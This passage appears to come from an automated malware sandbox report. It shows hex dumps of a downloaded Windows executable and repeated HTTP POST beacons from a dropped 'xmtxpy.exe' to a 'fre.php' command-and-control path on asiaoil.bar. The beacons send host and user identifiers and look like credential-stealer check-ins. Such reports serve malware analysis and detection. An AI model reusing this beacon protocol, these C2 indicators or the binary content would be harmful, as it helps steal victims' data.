00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELHZ%2p@sp.textvYZ `.rdatap^@@.datap@.ndata@.rsrct@@
                        Feb 10, 2022 10:21:50.385242939 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 3e 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 48 72 40 00 e9 42 01 00 00 53 56 8b 35 b0 3e 42 00 8d 45 a4
                        Data Ascii: U\}t+}FEuH>BHPuuuHr@BSV5>BEWPuLr@eEEPuPr@}eDp@FRVVU+MM3FQNUMVTUFPEEPMHp@EEPEPu
                        Feb 10, 2022 10:21:50.385256052 CET4INData Raw: 60 3f 42 00 89 88 20 3f 42 00 e9 44 13 00 00 8b 45 e4 8d 34 85 20 3f 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e8 8b 44 85 dc 89 0e e9 2e 13 00 00 ff 34 95 20 3f 42 00 56 e9 be 12 00 00 8b 0d 70 36 42 00 8b 35 60 72 40 00 3b cb 74 07 52 51 ff d6 8b
                        Data Ascii: `?B ?BDE4 ?B3;#MD.4 ?BVp6B5`r@;tRQE6B;PQjLuPp@j.WJ@;tBj\V?SWEp@u|p@=uWxp@uEEF:u9]tjWhB
                        Feb 10, 2022 10:21:50.385267019 CET5INData Raw: 63 0f 00 00 8b c8 8b 45 e8 83 f8 0c 77 6d ff 24 85 97 29 40 00 03 f9 eb 62 2b f9 eb 5e 0f af cf 8b f9 eb 57 3b cb 74 42 8b c7 99 f7 f9 8b f8 eb 4a 0b f9 eb 46 23 f9 eb 42 33 f9 eb 3e 33 c0 3b fb 0f 94 c0 eb e7 3b fb 75 0e eb 08 33 ff eb 2b 3b fb
                        Data Ascii: cEwm$)@b+^W;tBJF#B3>3;;u3+;t;t3G;t3EW|jjPWVr@wE=h@;tDH;?;u;h@WVL?h@PW=?h@VPL
                        Feb 10, 2022 10:21:50.385279894 CET7INData Raw: 14 71 40 00 8b f0 3b f3 74 3d 39 5d e4 89 5d fc 74 17 ff 75 e4 e8 6b f4 ff ff ff d6 85 c0 74 31 c7 45 fc 01 00 00 00 eb 28 68 00 90 40 00 68 68 af 40 00 68 00 40 42 00 68 00 04 00 00 ff 75 cc ff d6 83 c4 14 eb 0a ff 75 08 6a f7 e8 34 2e 00 00 39
                        Data Ascii: q@;t=9]]tukt1E(h@hh@h@Bhuuj4.9]Wq@yjKjDjjEjjEjEEVE5uj!EPhts@jShs@r@;EURhs@P;E
                        Feb 10, 2022 10:21:50.385297060 CET8INData Raw: 01 00 00 8d 4d 08 53 51 50 68 68 9f 40 00 56 e8 10 35 00 00 50 ff 15 28 71 40 00 e9 ae f0 ff ff 6a 02 89 5d d4 e8 c9 04 00 00 83 f8 01 89 45 cc 0f 8c 6f 03 00 00 b9 ff 03 00 00 3b c1 7e 03 89 4d cc 38 1e 0f 84 8e 00 00 00 56 88 5d 0b e8 d1 34 00
                        Data Ascii: MSQPhh@V5P(q@j]Eo;~M8V]49]E~}uESPEjPu,q@te}u_9]u!}t+}t%E>F:Et@;u|9EPW^4E8Et<t<u>FjSju4q@u>;8uSj
                        Feb 10, 2022 10:21:50.385313034 CET10INData Raw: 30 00 00 85 f6 8b f8 7d 06 57 e8 c2 32 00 00 8b c7 5f 5e c2 04 00 55 8b ec 81 ec 0c 01 00 00 53 56 8d 45 fc 57 50 a1 50 3f 42 00 0c 08 33 db 50 53 ff 75 0c ff 75 08 ff 15 10 70 40 00 3b c3 75 69 8b 35 08 70 40 00 bf 05 01 00 00 eb 19 39 5d 10 75
                        Data Ascii: 0}W2_^USVEWPP?B3PSuup@;ui5p@9]uKSPuuWPSutup@j3;t$S5P?Buuup@3@_^[9P?Buuup@uD$u$?BUEPP?BEPjj
                        Feb 10, 2022 10:21:50.385329962 CET11INData Raw: 08 56 50 ff 35 14 90 40 00 ff d3 85 c0 0f 84 c3 00 00 00 39 75 fc 0f 85 ba 00 00 00 ff 75 08 01 35 3c 70 41 00 e8 b6 00 00 00 3b c7 89 45 f8 0f 8c a4 00 00 00 39 7d 10 75 6b 39 7d 08 0f 8e 8e 00 00 00 be 38 30 41 00 bf 00 40 00 00 39 7d 08 7d 03
                        Data Ascii: VP5@9uu5<pA;E9}uk9}80A@9}}}EjPWV5@tm;}uhEjPuVu(q@t9}uEE)E<pA}0j3E;E|EMWQPu5@tE<pAEEjX_^[QSUV5<pA+5@Wt
                        Feb 10, 2022 10:21:50.385346889 CET12INData Raw: 00 00 6a 1a 66 c7 05 00 44 42 00 41 00 5f be 50 f0 41 00 a1 b0 3e 42 00 ff b0 20 01 00 00 56 e8 fd 25 00 00 56 ff 15 44 71 40 00 39 5c 24 10 74 3f 6a 01 56 68 00 ac 42 00 ff 15 a0 70 40 00 85 c0 74 2d 53 56 e8 03 23 00 00 a1 b0 3e 42 00 ff b0 24
                        Data Ascii: jfDBA_PA>B V%VDq@9\$t?jVhBp@t-SV#>B$V%V;tPp@\$DBOuSU"94?Bt{j(j(jw(;tH;tD;t@D$Pj(p@Pt,D$$Ph@SSSD$(SPSt$0D$8D$D
                        Feb 10, 2022 10:21:50.385364056 CET14INData Raw: 72 40 00 81 fb 0d 04 00 00 75 1a ff 35 78 36 42 00 ff 15 e8 71 40 00 8b 44 24 2c a3 78 36 42 00 e9 fc 03 00 00 83 fb 11 75 11 55 55 57 ff 15 30 72 40 00 33 c0 40 e9 0b 04 00 00 81 fb 11 01 00 00 0f 85 9d 00 00 00 0f b7 74 24 2c 56 57 ff 15 2c 72
                        Data Ascii: r@u5x6Bq@D$,x6BuUUW0r@3@t$,VW,r@;tUUhWDr@Wq@uV.u9-@~?jj_;u49-,?BtW=`Ajx0ju%`At$0t$0h5x6BDr@t$0t$0S
                        Feb 10, 2022 10:21:50.497762918 CET15INData Raw: 14 08 89 45 f8 74 06 50 ff d7 89 45 f8 f6 46 14 04 5f 74 0a 50 ff 75 0c ff 15 3c 70 40 00 f6 46 14 10 74 21 8b 46 08 89 45 f4 8b 46 0c 85 c0 74 07 50 ff 15 44 70 40 00 8d 45 f4 50 ff 15 48 70 40 00 89 46 0c 8b 46 0c eb 02 33 c0 5e c9 c2 0c 00 55
                        Data Ascii: EtPEF_tPu<p@Ft!FEFtPDp@EPHp@FF3^UE\AuQup@u-M\A3]U}SVW]{0}|6B+9>Bs4j"ECueG}EK?@Ls


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.2249166172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:21:59.753804922 CET312OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 176
                        Connection: close
                        Feb 10, 2022 10:21:59.770062923 CET312OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: 'ckav.ruAlbus704672ALBUS-PCk0DE4229FCF97F5879F50F8FD3K2qUq
                        Feb 10, 2022 10:21:59.836230040 CET313INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:21:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B14QjzK93WN7FMCRwgPdBoL4GvyuLTCNzn128gIE66EmvAljQdFfNPOn5qPxQ8nApBsPYHTSjURn1ssUf9vIO%2F1OL2%2BdI5plkWkZzNc4H79V9rsVWKoyCfjhFO%2FkqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4453c8e679137-FRA
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        10192.168.2.2249175104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:11.483872890 CET328OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:11.500328064 CET328OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:11.594872952 CET329INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:11 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=thdM9Np%2FCdPYSURDbhixX%2FX8u4tEOLZU%2FvVuDbDE134sivqgwq%2BaJfoO5vJ0tXiBljYm%2FC%2F30qIj93fbRfKfXGvl%2BpAnC9Vf%2FlfUUZamRBGfzlQvLCoIxHh%2BgetLJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44585da166940-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        11192.168.2.2249176172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:12.553925991 CET330OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:12.570199013 CET330OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:12.721690893 CET331INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BEFEhIgHNjdPe%2Fupr%2FEP7FioCKDN%2BQkotKPjVJOS%2Frml7qplaroEnTQz1FIinV2XsHaS%2FI7nUqbPdpg00nvPfbyrD1nl6xKScXbaQFyDSbzbSQdRqYsZkYL%2FaMhgSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4458c8c24904f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        12192.168.2.2249177104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:13.627098083 CET332OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:13.643413067 CET332OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:13.718802929 CET333INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:13 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KXNvxjzVfF4hz0T9dBMVDpRewCBTbhWivG59MXcrMq3Fz0H3HqGx%2F5DX%2Bne%2B%2FFccTkhD5ws8ZgjI27n620j0vO0mLN2fs3T3gcOiTbX8ownTlbqimc3Co0pX0aSa4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445933dcd9247-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        13192.168.2.2249178172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:14.784465075 CET334OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:14.800611973 CET334OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:14.920140982 CET335INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:14 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NVUp%2BcxarDGGCShA6A3fVGNJKlQzMKQTikn%2FmGyj3943bP7FxgEz5bihNVsOHsU3DbxzwdZ03uFPNgUbs9%2F0oEhIIT0nnSYYifUkfynsl2OJVPJCYFOqol8oHQboIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4459a7c04694c-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        14192.168.2.2249179172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:15.879811049 CET335OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:15.896128893 CET336OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:15.963191986 CET336INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:15 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YywndWPDbt1nWWBUZyOXzJTtQd6vv4%2FE1Tker%2B341XUrk33CDyk4IMaSDz5n%2BK2atL0VK3i5tDkfDiWK6GJ%2F3hUlhDHcf%2Fn6Pch6y%2FzzAYpnP5BzB5pzhQW97EcSSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445a1484f90e0-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        15192.168.2.2249180172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:17.221999884 CET337OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:17.238274097 CET337OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:17.311069012 CET338INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:17 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UjFRYEW1vf5tlCFa1f1vwHKik1aRVbAIBpy1RMsjGKnLW4Qrm9vJ89Nrs6dLqDWMcgVmBrYxiuG%2FUeCxjisf7RsLjasp6QzHWLM4TEeZkFdIUloz%2B3B9BJnC3ZRzZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445a9aa3b9249-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        16192.168.2.2249181172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:18.584774971 CET339OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:18.601130009 CET339OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:18.688278913 CET340INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KHC3Edk5h9AYeBTw4zi6GBAjPXoz6AEM7UyHRy8hW3je7zgNBBmtdwVwGpiSZh81JKEYltIiJgER6JT21WX3XjM2N0XFbkBnufuzgMA76%2Bp7Xcs80ietpmWj4LHaRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445b23bfc8fec-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        17192.168.2.2249182172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:20.304832935 CET341OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:20.321175098 CET341OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:20.398272991 CET342INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QULp3ZlAMhwUjANw1YvL4%2BMJk9Z%2FbESFzhJWPA0iK5uawopHl0uiRldRAdRBGHJQS%2BTh9FZdQ4ZFWsS9QSIa12g5o6LPT8XtnzGfCgSERqmR9OTXY0oGiJOB7t3gug%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445bcfe999158-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        18192.168.2.2249183172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:21.371169090 CET342OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:21.387509108 CET343OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:21.466526985 CET343INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jiD84uKNL21I2ykVJEfn%2Fe2gpHIc0bS1RI%2FxuxHXAll6ytxzAqIMdpyZN%2FG8qWdDRDaJWS8n4CpPnVVPzZ%2BUtnIhRTImE9cuCSP7f%2BgqcZKxN4KBiYwynSKxXPUruQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445c39a1192b3-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        19192.168.2.2249184172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:22.490195036 CET344OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
